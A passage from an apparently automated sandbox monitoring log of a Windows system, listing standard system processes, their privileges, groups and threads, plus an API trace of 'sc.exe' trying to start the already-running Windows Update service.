SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 94 os_tid = 0x12d4 Thread: id = 95 os_tid = 0xef4 Thread: id = 96 os_tid = 0xe48 Thread: id = 97 os_tid = 0xbec Thread: id = 98 os_tid = 0x310 Thread: id = 99 os_tid = 0xa28 Thread: id = 100 os_tid = 0x378 Thread: id = 101 os_tid = 0xfa8 Thread: id = 102 os_tid = 0xee4 Thread: id = 103 os_tid = 0xd94 Thread: id = 104 os_tid = 0xd9c Thread: id = 105 os_tid = 0xf18 Thread: id = 106 os_tid = 0x1200 Thread: id = 107 os_tid = 0x1170 Thread: id = 108 os_tid = 0x1008 Thread: id = 109 os_tid = 0x1140 Thread: id = 110 os_tid = 0x1154 Thread: id = 111 os_tid = 0x13f0 Thread: id = 112 os_tid = 0x13ec Thread: id = 113 os_tid = 0x13e8 Thread: id = 114 os_tid = 0x12ec Thread: id = 115 os_tid = 0x1290 Thread: id = 116 os_tid = 0x128c Thread: id = 117 os_tid = 0x1288 Thread: id = 118 os_tid = 0x1280 Thread: id = 119 os_tid = 0x1270 Thread: id = 120 os_tid = 0x126c Thread: id = 121 os_tid = 0x125c Thread: id = 122 os_tid = 0x1258 Thread: id = 123 os_tid = 0x1234 Thread: id = 124 os_tid = 0x1230 Thread: id = 125 os_tid = 0x122c Thread: id = 126 os_tid = 0x1228 Thread: id = 127 os_tid = 0x121c Thread: id = 128 os_tid = 0x1218 Thread: id = 129 os_tid = 0xf2c Thread: id = 130 os_tid = 0xf24 Thread: id = 131 os_tid = 0xf10 Thread: id = 132 os_tid = 0xf04 Thread: id = 133 os_tid = 0xee8 Thread: id = 134 os_tid = 0xaa0 Thread: id = 135 os_tid = 0xa30 Thread: id = 136 os_tid = 0xa14 Thread: id = 137 os_tid = 0xa0c Thread: id = 138 os_tid = 0x9e8 Thread: id = 139 os_tid = 0x9e0 Thread: id = 140 os_tid = 0x9d8 Thread: id = 141 os_tid = 0x9cc Thread: id = 142 os_tid = 0x9c4 Thread: id = 143 os_tid = 0x9b8 Thread: id = 144 os_tid = 0x9b0 Thread: id = 145 os_tid = 0x9a0 Thread: id = 146 os_tid = 0x998 Thread: id = 147 os_tid = 0x984 Thread: id = 148 os_tid = 0x978 Thread: id = 149 os_tid = 0x968 Thread: id = 150 os_tid = 0x95c Thread: id = 151 os_tid = 0x958 Thread: id = 152 os_tid = 0x944 Thread: id = 153 os_tid = 0x930 Thread: id = 154 os_tid = 0x914 Thread: id = 155 os_tid = 0x8ac Thread: id = 156 os_tid = 0x840 Thread: id = 157 os_tid = 0x83c Thread: id = 158 os_tid = 0x430 Thread: id = 159 os_tid = 0x7c0 Thread: id = 160 os_tid = 0x7bc Thread: id = 161 os_tid = 0x7ac Thread: id = 162 os_tid = 0x784 Thread: id = 163 os_tid = 0x780 Thread: id = 164 os_tid = 0x77c Thread: id = 165 os_tid = 0x6fc Thread: id = 166 os_tid = 0x678 Thread: id = 167 os_tid = 0x670 Thread: id = 168 os_tid = 0x660 Thread: id = 169 os_tid = 0x654 Thread: id = 170 os_tid = 0x61c Thread: id = 171 os_tid = 0x5d0 Thread: id = 172 os_tid = 0x5a0 Thread: id = 173 os_tid = 0x4ac Thread: id = 174 os_tid = 0x41c Thread: id = 175 os_tid = 0x414 Thread: id = 176 os_tid = 0x404 Thread: id = 177 os_tid = 0x158 Thread: id = 178 os_tid = 0x39c Thread: id = 179 os_tid = 0x2e8 Thread: id = 180 os_tid = 0x180 Thread: id = 181 os_tid = 0x234 Thread: id = 182 os_tid = 0x26c Thread: id = 183 os_tid = 0x2a0 Thread: id = 184 os_tid = 0x170 Thread: id = 185 os_tid = 0x1a8 Thread: id = 186 os_tid = 0x16c Thread: id = 187 os_tid = 0x3b0 Thread: id = 190 os_tid = 0x994 Thread: id = 191 os_tid = 0x13b4 Thread: id = 192 os_tid = 0x1164 Thread: id = 201 os_tid = 0xbf8 Thread: id = 202 os_tid = 0x798 Thread: id = 203 os_tid = 0x112c Thread: id = 204 os_tid = 0x1144 Thread: id = 205 os_tid = 0xf88 Thread: id = 215 os_tid = 0x42c Thread: id = 217 os_tid = 0x1160 Thread: id = 223 os_tid = 0x12a0 Thread: id = 224 os_tid = 0x12ac Thread: id = 225 os_tid = 0x1330 Thread: id = 226 os_tid = 0x12c8 Thread: id = 228 os_tid = 0x1354 Thread: id = 237 os_tid = 0x11ac Thread: id = 266 os_tid = 0xf28 Thread: id = 267 os_tid = 0xe90 Thread: id = 268 os_tid = 0x134 Thread: id = 269 os_tid = 0xebc Thread: id = 270 os_tid = 0xe84 Thread: id = 271 os_tid = 0xfa4 Thread: id = 290 os_tid = 0xf98 Thread: id = 654 os_tid = 0xb0 Thread: id = 683 os_tid = 0xa84 Thread: id = 684 os_tid = 0xd44 Thread: id = 685 os_tid = 0x888 Thread: id = 686 os_tid = 0xd38 Thread: id = 687 os_tid = 0x1388 Thread: id = 688 os_tid = 0x1180 Thread: id = 689 os_tid = 0x588 Thread: id = 690 os_tid = 0x13ac Thread: id = 691 os_tid = 0x1158 Thread: id = 698 os_tid = 0x8 Process: id = "16" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x36eec000" os_pid = "0x790" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 193 os_tid = 0x1220 Thread: id = 194 os_tid = 0xea0 Thread: id = 195 os_tid = 0xf48 Thread: id = 196 os_tid = 0xec Thread: id = 197 os_tid = 0x394 Thread: id = 198 os_tid = 0xca4 Thread: id = 199 os_tid = 0x6ec Thread: id = 200 os_tid = 0xd4c Process: id = "17" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x5bd61000" os_pid = "0xcd8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00082464" [0xc000000f] Thread: id = 207 os_tid = 0x380 Thread: id = 208 os_tid = 0x484 Thread: id = 213 os_tid = 0xa94 Thread: id = 214 os_tid = 0x6c4 Thread: id = 216 os_tid = 0xd80 Thread: id = 218 os_tid = 0xba0 Thread: id = 220 os_tid = 0x6a4 Thread: id = 221 os_tid = 0x11fc Thread: id = 227 os_tid = 0x12d8 Process: id = "18" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x202f9000" os_pid = "0x1370" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x3ac" cmd_line = "C:\\WINDOWS\\system32\\sc.exe start wuauserv" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xe], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 234 os_tid = 0x13d0 [0198.734] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff740180000 [0198.734] __set_app_type (_Type=0x1) [0198.734] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7401822b0) returned 0x0 [0198.735] __wgetmainargs (in: _Argc=0x7ff740191028, _Argv=0x7ff740191030, _Env=0x7ff740191038, _DoWildCard=0, _StartInfo=0x7ff740191044 | out: _Argc=0x7ff740191028, _Argv=0x7ff740191030, _Env=0x7ff740191038) returned 0 [0198.735] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.738] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0198.738] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.738] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0198.738] _wcsicmp (_String1="start", _String2="query") returned 2 [0198.738] _wcsicmp (_String1="start", _String2="queryex") returned 2 [0198.738] _wcsicmp (_String1="start", _String2="start") returned 0 [0198.738] ResolveDelayLoadedAPI () returned 0x7ffce9434cf0 [0198.741] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x28a207185b0 [0198.766] OpenServiceW (hSCManager=0x28a207185b0, lpServiceName="wuauserv", dwDesiredAccess=0x14) returned 0x28a20716b30 [0203.541] StartServiceW (hService=0x28a20716b30, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 0 [0203.584] GetLastError () returned 0x420 [0203.584] _ultow (in: _Dest=0x420, _Radix=-2117601144 | out: _Dest=0x420) returned="1056" [0203.584] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x420, dwLanguageId=0x0, lpBuffer=0x7ff740191640, nSize=0x400, Arguments=0x0 | out: lpBuffer="An instance of the service is already running.\r\n") returned 0x30 [0203.586] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xd781c7f840, nSize=0x2, Arguments=0xd781c7f870 | out: lpBuffer="栀ⁱʊ") returned 0x54 [0203.588] GetFileType (hFile=0x50) returned 0x2 [0203.588] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xd781c7f7f0 | out: lpMode=0xd781c7f7f0) returned 1 [0203.589] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x28a20716800*, nNumberOfCharsToWrite=0x54, lpNumberOfCharsWritten=0xd781c7f7e8, lpReserved=0x0 | out: lpBuffer=0x28a20716800*, lpNumberOfCharsWritten=0xd781c7f7e8*=0x54) returned 1 [0203.591] LocalFree (hMem=0x28a20716800) returned 0x0 [0203.591] LocalFree (hMem=0x0) returned 0x0 [0203.591] CloseServiceHandle (hSCObject=0x28a20716b30) returned 1 [0203.595] CloseServiceHandle (hSCObject=0x28a207185b0) returned 1 [0203.595] LocalFree (hMem=0x0) returned 0x0 [0203.595] exit (_Code=1056) Thread: id = 649 os_tid = 0x1358 Thread: id = 653 os_tid = 0x1358 Process: id = "19" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x19ec3000" os_pid = "0x1174" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x3ac" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xe], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 238 os_tid = 0x11a8 Thread: id = 239 os_tid = 0x1244 Thread: id = 240 os_tid = 0x11b8 Thread: id = 261 os_tid = 0x133c Thread: id = 262 os_tid = 0x1318 Thread: id = 264 os_tid = 0x1320 Thread: id = 670 os_tid = 0x12d0 Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x738d0000" os_pid = "0x3d8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\RmSvc" [0xa], "NT SERVICE\\TimeBrokerSvc" [0xa], "NT SERVICE\\TimeBroker" [0xa], "NT SERVICE\\vmictimesync" [0xa], "S-1-5-80-1495648203-2503502111-1597754693-3445174711-1316708627" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a38e" [0xc000000f], "LOCAL" [0x7] Thread: id = 241 os_tid = 0x348 Thread: id = 242 os_tid = 0x1214 Thread: id = 243 os_tid = 0x12f8 Thread: id = 244 os_tid = 0x1300 Thread: id = 245 os_tid = 0x1360 Thread: id = 246 os_tid = 0xc74 Thread: id = 247 os_tid = 0xf38 Thread: id = 248 os_tid = 0xf34 Thread: id = 249 os_tid = 0x54c Thread: id = 250 os_tid = 0x444 Thread: id = 251 os_tid = 0x418 Thread: id = 252 os_tid = 0x410 Thread: id = 253 os_tid = 0x35c Thread: id = 254 os_tid = 0x3f4 Thread: id = 255 os_tid = 0x3f0 Thread: id = 256 os_tid = 0x33c Thread: id = 257 os_tid = 0x238 Thread: id = 258 os_tid = 0x154 Thread: id = 259 os_tid = 0x3dc Process: id = "21" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2b1ce000" os_pid = "0x130c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x1370" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xe], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xe], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 274 os_tid = 0x1348 Thread: id = 284 os_tid = 0x51c Thread: id = 285 os_tid = 0xe10 Thread: id = 287 os_tid = 0xe20 Thread: id = 289 os_tid = 0xe24 Process: id = "22" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5d3c6000" os_pid = "0xf8c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0008a84c" [0xc000000f] Thread: id = 272 os_tid = 0xfb0 Thread: id = 273 os_tid = 0xa38 Thread: id = 276 os_tid = 0xe18 Thread: id = 277 os_tid = 0x1224 Thread: id = 278 os_tid = 0xdac Thread: id = 279 os_tid = 0xf78 Thread: id = 280 os_tid = 0x134c Thread: id = 281 os_tid = 0x13f4 Thread: id = 282 os_tid = 0xa4c Thread: id = 283 os_tid = 0x794 Process: id = "23" image_name = "System" filename = "" page_root = "0x1aa000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "created_daemon" parent_id = "18" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 291 os_tid = 0x80 Thread: id = 292 os_tid = 0x12a4 Thread: id = 293 os_tid = 0x18 Thread: id = 294 os_tid = 0x1c Thread: id = 295 os_tid = 0xe8 Thread: id = 296 os_tid = 0x1260 Thread: id = 297 os_tid = 0x14 Thread: id = 298 os_tid = 0x124 Thread: id = 299 os_tid = 0xef8 Thread: id = 300 os_tid = 0xef4 Thread: id = 301 os_tid = 0x128 Thread: id = 302 os_tid = 0xe58 Thread: id = 303 os_tid = 0x0 Thread: id = 304 os_tid = 0x30 Thread: id = 305 os_tid = 0x188 Thread: id = 306 os_tid = 0x100 Thread: id = 307 os_tid = 0xb18 Thread: id = 308 os_tid = 0xb14 Thread: id = 309 os_tid = 0xa8 Thread: id = 310 os_tid = 0xa64 Thread: id = 311 os_tid = 0xc4 Thread: id = 312 os_tid = 0x84 Thread: id = 313 os_tid = 0x9dc Thread: id = 314 os_tid = 0x974 Thread: id = 315 os_tid = 0x8d0 Thread: id = 316 os_tid = 0x8b0 Thread: id = 317 os_tid = 0x848 Thread: id = 318 os_tid = 0x844 Thread: id = 319 os_tid = 0x82c Thread: id = 320 os_tid = 0x4d8 Thread: id = 321 os_tid = 0x10 Thread: id = 322 os_tid = 0x664 Thread: id = 323 os_tid = 0x644 Thread: id = 324 os_tid = 0x64 Thread: id = 325 os_tid = 0x5e0 Thread: id = 326 os_tid = 0x34 Thread: id = 327 os_tid = 0x4a4 Thread: id = 328 os_tid = 0x49c Thread: id = 329 os_tid = 0x40 Thread: id = 330 os_tid = 0x1b8 Thread: id = 331 os_tid = 0x6c Thread: id = 332 os_tid = 0xb0 Thread: id = 333 os_tid = 0x364 Thread: id = 334 os_tid = 0x2c Thread: id = 335 os_tid = 0x1b4 Thread: id = 336 os_tid = 0x8c Thread: id = 337 os_tid = 0x2f8 Thread: id = 338 os_tid = 0x68 Thread: id = 339 os_tid = 0x174 Thread: id = 340 os_tid = 0xfc Thread: id = 341 os_tid = 0x60 Thread: id = 342 os_tid = 0x164 Thread: id = 343 os_tid = 0x70 Thread: id = 344 os_tid = 0x74 Thread: id = 345 os_tid = 0x1f8 Thread: id = 346 os_tid = 0x13c Thread: id = 347 os_tid = 0x1bc Thread: id = 348 os_tid = 0x1b0 Thread: id = 349 os_tid = 0x1ac Thread: id = 350 os_tid = 0x1a8 Thread: id = 351 os_tid = 0x28 Thread: id = 352 os_tid = 0x130 Thread: id = 353 os_tid = 0xe4 Thread: id = 354 os_tid = 0x20 Thread: id = 355 os_tid = 0x54 Thread: id = 356 os_tid = 0xbc Thread: id = 357 os_tid = 0x180 Thread: id = 358 os_tid = 0xc8 Thread: id = 359 os_tid = 0xa4 Thread: id = 360 os_tid = 0x50 Thread: id = 361 os_tid = 0x11c Thread: id = 362 os_tid = 0x120 Thread: id = 363 os_tid = 0x15c Thread: id = 364 os_tid = 0x14c Thread: id = 365 os_tid = 0xb8 Thread: id = 366 os_tid = 0x148 Thread: id = 367 os_tid = 0x88 Thread: id = 368 os_tid = 0xb4 Thread: id = 369 os_tid = 0xec Thread: id = 370 os_tid = 0x8 Thread: id = 371 os_tid = 0xf0 Thread: id = 650 os_tid = 0x4c Process: id = "24" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x56669000" os_pid = "0x23c" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "created_daemon" parent_id = "18" os_parent_pid = "0x1dc" cmd_line = "C:\\WINDOWS\\system32\\services.exe" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 372 os_tid = 0xd44 Thread: id = 373 os_tid = 0x3cc Thread: id = 374 os_tid = 0x86c Thread: id = 375 os_tid = 0x854 Thread: id = 376 os_tid = 0x12c Thread: id = 377 os_tid = 0x3ec Thread: id = 378 os_tid = 0x3e8 Thread: id = 379 os_tid = 0x3e4 Thread: id = 380 os_tid = 0x3d4 Thread: id = 381 os_tid = 0x3d0 Thread: id = 382 os_tid = 0x3bc Thread: id = 383 os_tid = 0x328 Thread: id = 384 os_tid = 0x2fc Thread: id = 385 os_tid = 0x298 Thread: id = 386 os_tid = 0x294 Process: id = "25" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75ed0000" os_pid = "0x2a4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BrokerInfrastructure" [0xa], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\DeviceInstall" [0xa], "NT SERVICE\\LSM" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT SERVICE\\SystemEventsBroker" [0xa], "NT AUTHORITY\\Logon Session 00000000:00004ed0" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 387 os_tid = 0xec8 Thread: id = 388 os_tid = 0x1350 Thread: id = 389 os_tid = 0x13c4 Thread: id = 390 os_tid = 0xb0c Thread: id = 391 os_tid = 0xa9c Thread: id = 392 os_tid = 0x9b4 Thread: id = 393 os_tid = 0x9a4 Thread: id = 394 os_tid = 0x99c Thread: id = 395 os_tid = 0x964 Thread: id = 396 os_tid = 0x960 Thread: id = 397 os_tid = 0x954 Thread: id = 398 os_tid = 0x948 Thread: id = 399 os_tid = 0x92c Thread: id = 400 os_tid = 0x918 Thread: id = 401 os_tid = 0x90c Thread: id = 402 os_tid = 0x75c Thread: id = 403 os_tid = 0x758 Thread: id = 404 os_tid = 0x638 Thread: id = 405 os_tid = 0x62c Thread: id = 406 os_tid = 0x40c Thread: id = 407 os_tid = 0x314 Thread: id = 408 os_tid = 0x2ec Thread: id = 409 os_tid = 0x3b4 Thread: id = 410 os_tid = 0x358 Thread: id = 411 os_tid = 0x354 Thread: id = 412 os_tid = 0x340 Thread: id = 413 os_tid = 0x32c Thread: id = 414 os_tid = 